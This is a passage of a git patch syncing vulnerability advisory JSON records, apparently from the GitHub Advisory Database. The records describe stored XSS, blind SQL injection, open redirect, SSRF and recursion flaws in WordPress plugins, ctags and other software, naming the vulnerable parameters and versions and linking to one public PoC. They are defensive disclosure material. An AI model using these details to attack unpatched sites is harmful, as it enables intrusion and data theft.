"ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.0.2-0.20260215211005-727213631ce6" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/abhinavxd/libredesk/security/advisories/GHSA-wgm6-9rvv-3438" + }, + { + "type": "WEB", + "url": "https://github.com/abhinavxd/libredesk/commit/727213631ce6a36bcb06f50ce542155e78f51316" + }, + { + "type": "PACKAGE", + "url": "https://github.com/abhinavxd/libredesk" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-209", + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T00:56:30Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-2x45-7fc3-mxwq/GHSA-2x45-7fc3-mxwq.json b/advisories/unreviewed/2025/07/GHSA-2x45-7fc3-mxwq/GHSA-2x45-7fc3-mxwq.json deleted file mode 100644 index 9f2d0a3d1768a..0000000000000 --- a/advisories/unreviewed/2025/07/GHSA-2x45-7fc3-mxwq/GHSA-2x45-7fc3-mxwq.json +++ /dev/null @@ -1,44 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-2x45-7fc3-mxwq", - "modified": "2025-07-31T21:31:53Z", - "published": "2025-07-31T21:31:53Z", - "aliases": [ - "CVE-2025-45769" - ], - "details": "php-jwt v6.11.0 was discovered to contain weak encryption.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" - } - ], - "affected": [], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-45769" - }, - { - "type": "WEB", - "url": "https://gist.github.com/ZupeiNie/83756316c4c24fe97a50176a92608db3" - }, - { - "type": "WEB", - "url": "https://github.com/firebase" - }, - { - "type": "WEB", - "url": "https://github.com/firebase/php-jwt" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-326" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2025-07-31T20:15:33Z" - } -} \ No newline at end of file From 7203f6466f8d054a3b4130f47f2191774069c112 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 06:31:37 +0000 Subject: [PATCH 147/215] Advisory Database Sync --- .../GHSA-354p-69pj-7hrh.json | 25 ++++++ .../GHSA-3gjc-g73c-46x5.json | 25 ++++++ .../GHSA-4292-3qv2-cv3v.json | 40 ++++++++++ .../GHSA-43j7-cmcw-j9hr.json | 52 ++++++++++++ .../GHSA-4r69-36rj-xggj.json | 40 ++++++++++ .../GHSA-4wq4-57x2-fmhv.json | 44 ++++++++++ .../GHSA-568p-hhxc-vvx8.json | 29 +++++++ .../GHSA-5g55-5vv7-848g.json | 40 ++++++++++ .../GHSA-69fg-c96p-c6fq.json | 60 ++++++++++++++ .../GHSA-763r-9v7r-f8fj.json | 25 ++++++ .../GHSA-7f6r-mp5f-rh8r.json | 48 +++++++++++ .../GHSA-cpmc-9298-xjhp.json | 48 +++++++++++ .../GHSA-fv33-cj5h-48j8.json | 44 ++++++++++ .../GHSA-fvjg-wx7c-4qc5.json | 48 +++++++++++ .../GHSA-fx3v-rgv7-qq3x.json | 44 ++++++++++ .../GHSA-g4wh-mv47-2hg5.json | 80 +++++++++++++++++++ .../GHSA-g8mp-px4h-fw43.json | 64 +++++++++++++++ .../GHSA-gcff-gvxv-7jgm.json | 52 ++++++++++++ .../GHSA-ghf8-ggp8-97wj.json | 25 ++++++ .../GHSA-h858-mf2m-8jf4.json | 52 ++++++++++++ .../GHSA-jg87-hjf9-gf64.json | 25 ++++++ .../GHSA-m3jj-4hf6-wgch.json | 25 ++++++ .../GHSA-mcrh-3qmp-x37p.json | 44 ++++++++++ .../GHSA-pj33-46c7-rm7p.json | 52 ++++++++++++ .../GHSA-qph2-xm7h-wv73.json | 48 +++++++++++ .../GHSA-qw9p-rfpx-fxh5.json | 40 ++++++++++ .../GHSA-rgq3-q5rc-mjc3.json | 48 +++++++++++ .../GHSA-rj4g-w683-5gq4.json | 48 +++++++++++ .../GHSA-vfcp-69jm-85xv.json | 25 ++++++ .../GHSA-vrm4-h3r4-hh29.json | 25 ++++++ .../GHSA-wpf3-wv8v-2wxj.json | 40 ++++++++++ 31 files changed, 1305 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-354p-69pj-7hrh/GHSA-354p-69pj-7hrh.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3gjc-g73c-46x5/GHSA-3gjc-g73c-46x5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4292-3qv2-cv3v/GHSA-4292-3qv2-cv3v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-43j7-cmcw-j9hr/GHSA-43j7-cmcw-j9hr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4r69-36rj-xggj/GHSA-4r69-36rj-xggj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4wq4-57x2-fmhv/GHSA-4wq4-57x2-fmhv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-568p-hhxc-vvx8/GHSA-568p-hhxc-vvx8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5g55-5vv7-848g/GHSA-5g55-5vv7-848g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-69fg-c96p-c6fq/GHSA-69fg-c96p-c6fq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-763r-9v7r-f8fj/GHSA-763r-9v7r-f8fj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7f6r-mp5f-rh8r/GHSA-7f6r-mp5f-rh8r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cpmc-9298-xjhp/GHSA-cpmc-9298-xjhp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fv33-cj5h-48j8/GHSA-fv33-cj5h-48j8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fvjg-wx7c-4qc5/GHSA-fvjg-wx7c-4qc5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fx3v-rgv7-qq3x/GHSA-fx3v-rgv7-qq3x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-g4wh-mv47-2hg5/GHSA-g4wh-mv47-2hg5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-g8mp-px4h-fw43/GHSA-g8mp-px4h-fw43.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gcff-gvxv-7jgm/GHSA-gcff-gvxv-7jgm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-ghf8-ggp8-97wj/GHSA-ghf8-ggp8-97wj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h858-mf2m-8jf4/GHSA-h858-mf2m-8jf4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jg87-hjf9-gf64/GHSA-jg87-hjf9-gf64.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m3jj-4hf6-wgch/GHSA-m3jj-4hf6-wgch.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mcrh-3qmp-x37p/GHSA-mcrh-3qmp-x37p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pj33-46c7-rm7p/GHSA-pj33-46c7-rm7p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qph2-xm7h-wv73/GHSA-qph2-xm7h-wv73.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qw9p-rfpx-fxh5/GHSA-qw9p-rfpx-fxh5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rgq3-q5rc-mjc3/GHSA-rgq3-q5rc-mjc3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rj4g-w683-5gq4/GHSA-rj4g-w683-5gq4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vfcp-69jm-85xv/GHSA-vfcp-69jm-85xv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vrm4-h3r4-hh29/GHSA-vrm4-h3r4-hh29.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wpf3-wv8v-2wxj/GHSA-wpf3-wv8v-2wxj.json diff --git a/advisories/unreviewed/2026/02/GHSA-354p-69pj-7hrh/GHSA-354p-69pj-7hrh.json b/advisories/unreviewed/2026/02/GHSA-354p-69pj-7hrh/GHSA-354p-69pj-7hrh.json new file mode 100644 index 0000000000000..2f5abda6b669e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-354p-69pj-7hrh/GHSA-354p-69pj-7hrh.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-354p-69pj-7hrh", + "modified": "2026-02-18T06:30:18Z", + "published": "2026-02-18T06:30:18Z", + "aliases": [ + "CVE-2026-27038" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27038" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T04:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3gjc-g73c-46x5/GHSA-3gjc-g73c-46x5.json b/advisories/unreviewed/2026/02/GHSA-3gjc-g73c-46x5/GHSA-3gjc-g73c-46x5.json new file mode 100644 index 0000000000000..6ea96b837d889 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3gjc-g73c-46x5/GHSA-3gjc-g73c-46x5.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3gjc-g73c-46x5", + "modified": "2026-02-18T06:30:18Z", + "published": "2026-02-18T06:30:18Z", + "aliases": [ + "CVE-2026-27036" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27036" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T04:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4292-3qv2-cv3v/GHSA-4292-3qv2-cv3v.json b/advisories/unreviewed/2026/02/GHSA-4292-3qv2-cv3v/GHSA-4292-3qv2-cv3v.json new file mode 100644 index 0000000000000..f6c829558b061 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4292-3qv2-cv3v/GHSA-4292-3qv2-cv3v.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4292-3qv2-cv3v", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2025-12037" + ], + "details": "The WP 404 Auto Redirect to Similar Post plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.0.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12037" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/log/wp-404-auto-redirect-to-similar-post" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c20059de-9d81-4318-a015-8e402945828c?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T05:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-43j7-cmcw-j9hr/GHSA-43j7-cmcw-j9hr.json b/advisories/unreviewed/2026/02/GHSA-43j7-cmcw-j9hr/GHSA-43j7-cmcw-j9hr.json new file mode 100644 index 0000000000000..b5371d7d0af4b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-43j7-cmcw-j9hr/GHSA-43j7-cmcw-j9hr.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-43j7-cmcw-j9hr", + "modified": "2026-02-18T06:30:18Z", + "published": "2026-02-18T06:30:18Z", + "aliases": [ + "CVE-2025-12074" + ], + "details": "The Context Blog theme for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.2.5 via the 'context_blog_modal_popup' due to insufficient restrictions on which posts can be included. This makes it possible for unauthenticated attackers to extract data from password protected, private, or draft posts that they should not have access to.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12074" + }, + { + "type": "WEB", + "url": "https://themes.svn.wordpress.org/context-blog/1.2.1/inc/ajax/modal-popup.php" + }, + { + "type": "WEB", + "url": "https://themes.trac.wordpress.org/changeset/297968" + }, + { + "type": "WEB", + "url": "https://wordpress.org/themes/context-blog" + }, + { + "type": "WEB", + "url": "https://www.postmagthemes.com/downloads/context-blog-free-wordpress-theme" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/25552fdb-c55b-4390-a614-7c007c5fe7b1?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T05:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4r69-36rj-xggj/GHSA-4r69-36rj-xggj.json b/advisories/unreviewed/2026/02/GHSA-4r69-36rj-xggj/GHSA-4r69-36rj-xggj.json new file mode 100644 index 0000000000000..e24a813ced989 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4r69-36rj-xggj/GHSA-4r69-36rj-xggj.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4r69-36rj-xggj", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2025-11737" + ], + "details": "The VK All in One Expansion Unit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'vkExUnit_sns_title' parameter in all versions up to, and including, 9.112.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11737" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3402996%40vk-all-in-one-expansion-unit&new=3402996%40vk-all-in-one-expansion-unit&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1e7efb39-fada-4167-825c-21cc31948a63?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T06:16:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4wq4-57x2-fmhv/GHSA-4wq4-57x2-fmhv.json b/advisories/unreviewed/2026/02/GHSA-4wq4-57x2-fmhv/GHSA-4wq4-57x2-fmhv.json new file mode 100644 index 0000000000000..e9956057d08ba --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4wq4-57x2-fmhv/GHSA-4wq4-57x2-fmhv.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4wq4-57x2-fmhv", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2025-6460" + ], + "details": "The Display During Conditional Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘message’ parameter in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6460" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3455051" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/display-during-conditional-shortcode/#developers" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ad39a3b0-5434-4595-a052-4b6e4adb2247?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T05:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-568p-hhxc-vvx8/GHSA-568p-hhxc-vvx8.json b/advisories/unreviewed/2026/02/GHSA-568p-hhxc-vvx8/GHSA-568p-hhxc-vvx8.json new file mode 100644 index 0000000000000..85d2b669e2761 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-568p-hhxc-vvx8/GHSA-568p-hhxc-vvx8.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-568p-hhxc-vvx8", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2026-1368" + ], + "details": "The Video Conferencing with Zoom WordPress plugin before 4.6.6 contains an AJAX handler that has its nonce verification commented out, allowing unauthenticated attackers to generate valid Zoom SDK signatures for any meeting ID and retrieve the site's Zoom SDK key.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1368" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/218e6655-c5aa-4bce-86b2-cad3bb20020c" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T06:16:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5g55-5vv7-848g/GHSA-5g55-5vv7-848g.json b/advisories/unreviewed/2026/02/GHSA-5g55-5vv7-848g/GHSA-5g55-5vv7-848g.json new file mode 100644 index 0000000000000..b32d5ce03dc02 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5g55-5vv7-848g/GHSA-5g55-5vv7-848g.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5g55-5vv7-848g", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2025-12122" + ], + "details": "The Popup Box – Easily Create WordPress Popups plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'iframeBox' shortcode in all versions up to, and including, 3.2.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12122" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3410472%40popup-box&new=3410472%40popup-box&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a7eeb557-0528-422a-aae7-3f99154953df?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T06:16:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-69fg-c96p-c6fq/GHSA-69fg-c96p-c6fq.json b/advisories/unreviewed/2026/02/GHSA-69fg-c96p-c6fq/GHSA-69fg-c96p-c6fq.json new file mode 100644 index 0000000000000..d246f61aed11a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-69fg-c96p-c6fq/GHSA-69fg-c96p-c6fq.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-69fg-c96p-c6fq", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2026-2641" + ], + "details": "A weakness has been identified in universal-ctags ctags up to 6.2.1. The affected element is the function parseExpression/parseExprList of the file parsers/v.c of the component V Language Parser. Executing a manipulation can lead to uncontrolled recursion. It is possible to launch the attack on the local host. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2641" + }, + { + "type": "WEB", + "url": "https://github.com/universal-ctags/ctags/issues/4369" + }, + { + "type": "WEB", + "url": "https://github.com/oneafter/0116/blob/main/poc.v" + }, + { + "type": "WEB", + "url": "https://github.com/universal-ctags/ctags" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346397" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346397" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752768" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-404" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T06:16:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-763r-9v7r-f8fj/GHSA-763r-9v7r-f8fj.json b/advisories/unreviewed/2026/02/GHSA-763r-9v7r-f8fj/GHSA-763r-9v7r-f8fj.json new file mode 100644 index 0000000000000..778e6419c3092 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-763r-9v7r-f8fj/GHSA-763r-9v7r-f8fj.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-763r-9v7r-f8fj", + "modified": "2026-02-18T06:30:18Z", + "published": "2026-02-18T06:30:18Z", + "aliases": [ + "CVE-2026-27032" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27032" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T04:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7f6r-mp5f-rh8r/GHSA-7f6r-mp5f-rh8r.json b/advisories/unreviewed/2026/02/GHSA-7f6r-mp5f-rh8r/GHSA-7f6r-mp5f-rh8r.json new file mode 100644 index 0000000000000..7f10555e9287f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7f6r-mp5f-rh8r/GHSA-7f6r-mp5f-rh8r.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7f6r-mp5f-rh8r", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2026-1639" + ], + "details": "The Taskbuilder – WordPress Project Management & Task Management plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'order' and 'sort_by' parameters in all versions up to, and including, 5.0.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1639" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/taskbuilder/tags/5.0.2/includes/admin/projects/projects_list.php#L136" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/taskbuilder/tags/5.0.2/includes/admin/projects/projects_list.php#L138" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/taskbuilder/tags/5.0.2/includes/admin/projects/projects_list.php#L14" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2cfdde5c-f0e3-4597-9789-3ff0347719c6?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T06:16:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cpmc-9298-xjhp/GHSA-cpmc-9298-xjhp.json b/advisories/unreviewed/2026/02/GHSA-cpmc-9298-xjhp/GHSA-cpmc-9298-xjhp.json new file mode 100644 index 0000000000000..24f4fe3bfb7e8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cpmc-9298-xjhp/GHSA-cpmc-9298-xjhp.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cpmc-9298-xjhp", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2026-1296" + ], + "details": "The Frontend Post Submission Manager Lite plugin for WordPress is vulnerable to Open Redirection in all versions up to, and including, 1.2.7 due to insufficient validation on the 'requested_page' POST parameter in the verify_username_password function. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1296" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/frontend-post-submission-manager-lite/tags/1.2.6/includes/classes/class-fpsml-shortcode.php#L108" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/frontend-post-submission-manager-lite/trunk/includes/classes/class-fpsml-shortcode.php#L108" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3458652%40frontend-post-submission-manager-lite&new=3458652%40frontend-post-submission-manager-lite&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/92c52129-7cf5-4a1b-80a1-b01140e6a72b?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-601" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T05:16:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fv33-cj5h-48j8/GHSA-fv33-cj5h-48j8.json b/advisories/unreviewed/2026/02/GHSA-fv33-cj5h-48j8/GHSA-fv33-cj5h-48j8.json new file mode 100644 index 0000000000000..9f05303d25898 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fv33-cj5h-48j8/GHSA-fv33-cj5h-48j8.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fv33-cj5h-48j8", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2025-13959" + ], + "details": "The Filestack plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'filepicker' shortcode in all versions up to, and including, 2.0.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13959" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/filepicker-media-uploader/tags/2.0.8/lib/shortcodes.php#L20" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/filepicker-media-uploader/trunk/lib/shortcodes.php#L20" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2777794d-2c0a-4843-bed8-78e607d4e796?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": 